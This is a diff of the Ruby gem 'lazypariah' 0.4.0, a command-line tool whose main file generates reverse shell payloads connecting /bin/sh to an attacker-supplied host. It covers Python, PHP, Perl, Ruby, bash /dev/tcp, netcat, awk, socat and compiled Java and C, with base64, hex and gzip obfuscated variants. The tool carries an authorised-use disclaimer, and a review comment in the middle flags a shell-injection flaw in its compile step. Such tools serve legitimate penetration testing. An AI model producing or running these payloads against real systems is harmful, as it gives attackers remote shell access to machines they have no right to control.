lazypariah 0.4.0
- checksums.yaml +7 -0
- data/bin/lazypariah +332 -0
- metadata +51 -0
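--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
+data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
+SHA512:
+metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
+data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93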
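--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -0,0 +1,332 @@
+#!/usr/bin/env ruby
+#
+# Title: LAZYPARIAH
+# Version: 0.4.0
+# Description:
+# LAZYPARIAH is a simple tool for generating various reverse shell payloads
+# on the fly. It is intended to be used only in authorised circumstances by
+# qualified penetration testers, security researchers and red team professionals.
+#
+# Copyright (C) 2020 Peter Bruce Funnell
+#
+# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
+# General Public License as published by the Free Software Foundation, either version 3 of the License,
+# or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
+# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
+# License for more details.
+#
+# You should have received a copy of the GNU General Public License along with this program. If not,
+# see <https://www.gnu.org/licenses/>.
+
+# Load the necessary gems.
+require "base64"
+require "optparse"
+require "erb"
+require "zlib"
+require "stringio"
+
+# Define constants.
+PROGRAM_NAME = "LAZYPARIAH".freeze()
+PROGRAM_VERSION = "0.4.0".freeze()
+EXECUTABLE_NAME = "lazypariah".freeze()
+
+# Define payload list.
+PAYLOAD_LIST = [
+"python",
+"python3_c",
+"python2_c",
+"python_c",
+"python3_b64",
+"python2_b64",
+"python_b64",
+"python3_hex",
+"python2_hex",
+"python_hex",
+"nc",
+"nc_pipe",
+"php_fd_3",
+"php_fd_4",
+"php_fd_5",
+"php_fd_6",
+"php_fd_3_c",
+"php_fd_4_c",
+"php_fd_5_c",
+"php_fd_6_c",
+"php_fd_3_tags",
+"php_fd_4_tags",
+"php_fd_5_tags",
+"php_fd_6_tags",
+"perl",
+"perl_c",
+"perl_b64",
+"perl_hex",
+"ruby",
+"ruby_c",
+"ruby_b64",
+"ruby_hex",
+"bash_tcp",
+"awk",
+"socat",
+"java_class_binary",
+"java_class_b64",
+"java_class_gzip_b64",
+"c_binary",
+"c_binary_b64",
+"c_binary_hex",
+"c_binary_gzip",
+"c_binary_gzip_b64",
+"c_binary_gzip_hex"
+].sort()
+
+# Define function for displaying program information.
+def prog_info(donation_info=true)
+puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
+puts("Copyright (C) 2020 Peter Bruce Funnell")
+if donation_info
+puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
+end
+end
+
+# Initialise command line argument parser.
+option_parser = OptionParser.new do |options|
+options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
+options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
+options.banner << "Example:\tlazypariah -u python3_b64 10.10.14.4 1555\n"
+options.banner << "Example:\tlazypariah python2_c malicious.local 1337\n\n"
+options.banner << "Valid Payloads:\n"
+PAYLOAD_LIST.each do |p|
+options.banner << "#{" "*4}#{p}\n"
+end
+options.banner << "\nValid Options:\n"
+options.on("-h", "--help", "Display help text and exit.")
+options.on("-l", "--license", "Display license information and exit.")
+options.on("-u", "--url", "URL-encode the payload.")
+options.on("-v", "--version", "Display version information and exit.\n\n")
+end
+
+# Define port_check method for strings.
+class String
+def port_check()
+(self.to_i.to_s == self) and (self.to_i >= 0 and self.to_i <= 65535)
+end
+end
+
+# Define print_output.
+def print_output(s, url_encode=false)
+if url_encode
+print(ERB::Util.url_encode(s))
+else
+print(s)
+end
+end
+
+# Attempt to parse command line arguments.
+begin
+arguments = Hash.new()
+option_parser.parse!(into: arguments)
+if arguments[:version]
+prog_info(donation_info=false)
+exit()
+else
+if arguments.length < 1 and ARGV.length < 1
+prog_info()
+puts("\nNo command line arguments were detected. Please consult the help text below for details on how to use #{PROGRAM_NAME}.\n")
+puts(option_parser)
+exit()
+elsif arguments[:help]
+prog_info()
+puts(option_parser)
+exit()
+elsif arguments[:license]
+prog_info(donation_info=false)
+puts("\nThis program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>.")
+elsif ARGV.length < 3
+prog_info()
+puts("\nThe command line arguments given to #{PROGRAM_NAME} were insufficient. #{PROGRAM_NAME} requires a payload type, attacker IP address and an attacker port in order to generate a reverse shell payload.\n")
+puts(option_parser)
+exit()
+elsif ARGV.length > 3
+prog_info()
+puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
+puts(option_parser)
+exit()
+elsif not PAYLOAD_LIST.include?(ARGV[0])
+prog_info()
+puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
+puts(option_parser)
+exit()
+elsif not ARGV[2].port_check()
+prog_info()
+puts("\nThe specified port was invalid. Please specify a port between 0 and 65535 (inclusive).\n\n")
+else
+url_encode = arguments[:url] ? true: false
+case ARGV[0]
+when "python"
+print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode)
+when "python3_c"
+print_output("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python2_c"
+print_output("python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python_c"
+print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
+when "python3_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
+when "python3_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
+when "python2_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
+when "python2_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
+when "python_b64"
+code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
+when "python_hex"
+code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
+when "nc"
+print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
+when "nc_pipe"
+print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
+when "php_fd_3"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");", url_encode=url_encode)
+when "php_fd_4"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");", url_encode=url_encode)
+when "php_fd_5"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");", url_encode=url_encode)
+when "php_fd_6"
+print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");", url_encode=url_encode)
+when "php_fd_3_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", url_encode=url_encode)
+when "php_fd_4_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");'", url_encode=url_encode)
+when "php_fd_5_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");'", url_encode=url_encode)
+when "php_fd_6_c"
+print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");'", url_encode=url_encode)
+when "php_fd_3_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&3 >&3 2>&3\");?>", url_encode=url_encode)
+when "php_fd_4_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&4 >&4 2>&4\");?>", url_encode=url_encode)
+when "php_fd_5_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
+when "php_fd_6_tags"
+print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
+when "perl"
+print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
+when "perl_c"
+print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
+when "perl_b64"
+code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
+print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
+when "perl_hex"
+code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
+when "ruby"
+print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
+when "ruby_c"
+print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
+when "ruby_b64"
+code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
+print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
+when "ruby_hex"
+code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
+print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
+when "bash_tcp"
+print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
+when "awk"
+print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
+when "socat"
+print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
+when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
+code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.java"
+
+system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
+
+File.open(temp_dir+"/rs.class", "r") do |f|
+java_payload = f.read()
+case ARGV[0]
+when "java_class_binary"
+print_output(java_payload)
+when "java_class_b64"
+java_payload_b64 = Base64.strict_encode64(java_payload)
+print_output(java_payload_b64, url_encode=url_encode)
+when "java_class_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(java_payload)
+gz.close()
+java_payload_gzip = sio.string
+java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
+print_output(java_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
+when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
+code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.c"
+
+system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
+
+File.open(temp_dir+"/rs", "r") do |f|
+binary_payload = f.read()
+case ARGV[0]
+when "c_binary"
+print_output(binary_payload)
+when "c_binary_b64"
+binary_payload_b64 = Base64.strict_encode64(binary_payload)
+print_output(binary_payload_b64, url_encode=url_encode)
+when "c_binary_hex"
+binary_payload_hex = binary_payload.unpack("H*")[0]
+print_output(binary_payload_hex)
+when "c_binary_gzip"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+print_output(binary_payload_gzip)
+when "c_binary_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
+print_output(binary_payload_gzip_b64, url_encode=url_encode)
+when "c_binary_gzip_hex"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
+print_output(binary_payload_gzip_hex)
+end
+end
+
+system("rm -r #{temp_dir}")
+end
+end
+end
+rescue OptionParser::InvalidOption, OptionParser::MissingArgument
+# Invalid command line arguments were detected. Say so, display the help text, and exit.
+puts("\nOne or more command line arguments were invalid.\n")
+puts(option_parser)
+exit()
+end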
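Review bot: The Java and C branches (file lines 249-252 and 278-281) hand user-controlled text to a shell by string interpolation — `system("echo '#{code}' > #{temp_file}; javac #{temp_file};")` — and `code` embeds `ARGV[1]`, which unlike the port never passes a check, so a host argument containing a quote or shell metacharacter is parsed by the local shell instead of landing in the generated source; in a plain CLI the user is only injecting into their own session, but any wrapper that forwards a host string (a web front end, a script) turns this into real command injection. The cleanup `system("rm -r #{temp_dir}")` is also not in an `ensure`, so when `javac` or `gcc` is missing or fails the subsequent `File.open` raises an unhandled `Errno::ENOENT` and the temporary directory is left behind. Writing the source with `File.write`, running the compiler in argv form (`system("javac", temp_file)`) and wrapping the work in `Dir.mktmpdir` (stdlib; needs `require "tmpdir"` next to the other requires) removes both the shell round trip and the hand-rolled `mktemp`/`rm`, and the artefact reads should use `File.binread` or mode `"rb"` since a `.class` file and an ELF binary are not text. Separately, the `c_binary`, `c_binary_hex`, `c_binary_gzip` and `c_binary_gzip_hex` branches call `print_output` without `url_encode`, so `-u` is silently ignored there while the `_b64` variants honour it.
```ruby
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
# … unchanged: Java source assigned to `code` …
Dir.mktmpdir("lazypariah_") do |temp_dir|
  temp_file = File.join(temp_dir, "rs.java")
  File.write(temp_file, code)
  # argv form: the compiler receives the path directly, nothing is re-parsed by /bin/sh
  abort("javac failed or is not installed") unless system("javac", temp_file)
  java_payload = File.binread(File.join(temp_dir, "rs.class"))
  # … unchanged: case ARGV[0] selecting the binary / b64 / gzip_b64 output …
end
# Dir.mktmpdir removes temp_dir on block exit, so the system("rm -r ...") line goes away
```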
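--- a/metadata
+++ b/metadata
@@ -0,0 +1,51 @@
+--- !ruby/object:Gem::Specification
+name: lazypariah
+version: !ruby/object:Gem::Version
+version: 0.4.0
+platform: ruby
+authors:
+- Peter Funnell
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2020-11-24 00:00:00.000000000 Z
+dependencies: []
+description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
+on the fly. It is intended to be used only in authorised circumstances by qualified
+penetration testers, security researchers and red team professionals. Before downloading,
+installing or using this tool, ensure that you understand the relevant laws in your
+jurisdiction. The author of this tool does not endorse the usage of this tool for
+illegal or unauthorised purposes.
+email: hello@octetsplicer.com
+executables:
+- lazypariah
+extensions: []
+extra_rdoc_files: []
+files:
+- bin/lazypariah
+homepage: https://github.com/octetsplicer/LAZYPARIAH
+licenses:
+- GPL-3.0+
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: 2.7.1
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements:
+- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
+and OpenJDK (for Java payloads).
+rubygems_version: 3.1.2
+signing_key:
+specification_version: 4
+summary: A tool for generating reverse shell payloads on the fly.
+test_files: []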